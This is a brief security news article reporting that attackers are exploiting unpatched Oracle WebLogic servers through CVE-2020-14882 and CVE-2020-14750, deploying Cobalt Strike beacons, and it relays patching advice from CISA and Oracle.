Attackers Exploiting Unpatched Oracle WebLogic Servers

Recently, attackers have been observed using new tricks as they actively scanning for exposed Oracle WebLogic servers that are vulnerable to a recently disclosed unauthenticated RCE flaw.

Active exploitation of WebLogic servers

In the latest series of attacks, cybercriminals were seen actively targeting Oracle WebLogic servers scanning for high-severity vulnerability CVE-2020-14882 that has a CVSS score of 9.8/10.
  • The details about the vulnerability were made publicly available only a few weeks ago.
  • Cybersecurity firm Spyse reported over 3,300 exposed Oracle WebLogic servers reachable over the public internet and were potentially vulnerable.
  • Further, attackers were also spotted exploiting a no-auth RCE vulnerability (CVE-2020-14750) to compromise unpatched WebLogic servers. 
  • In October-end, the SANS Internet Storm Center had also confirmed the active exploitation of these two vulnerabilities.

Modus operandi

  • Attackers allegedly deploy Cobalt Strike beacons, allowing persistent remote access on the compromised Oracle WebLogic servers.
  • The new campaign uses a chain of base64-encoded PowerShell obfuscated scripts to download a Cobalt Strike payload.

Warning and patches

  • Due to the widespread dissemination and evident active exploitation of these critical vulnerabilities, CISA had released an alert urging users and administrators to apply available patches.
  • A patch for CVE-2020-14882 has been already released in the Oracle Critical Patch Update in October 2020.
  • Recently, Oracle issued a supplementary advisory for the remote code execution vulnerability (CVE-2020-14750) in the same WebLogic component.

Closing statement

Organizations running Oracle WebLogic Server are advised to patch both the vulnerabilities at the earliest. Additionally, experts recommend having an automated patch management process to prevent the exploitation of such threats in the future.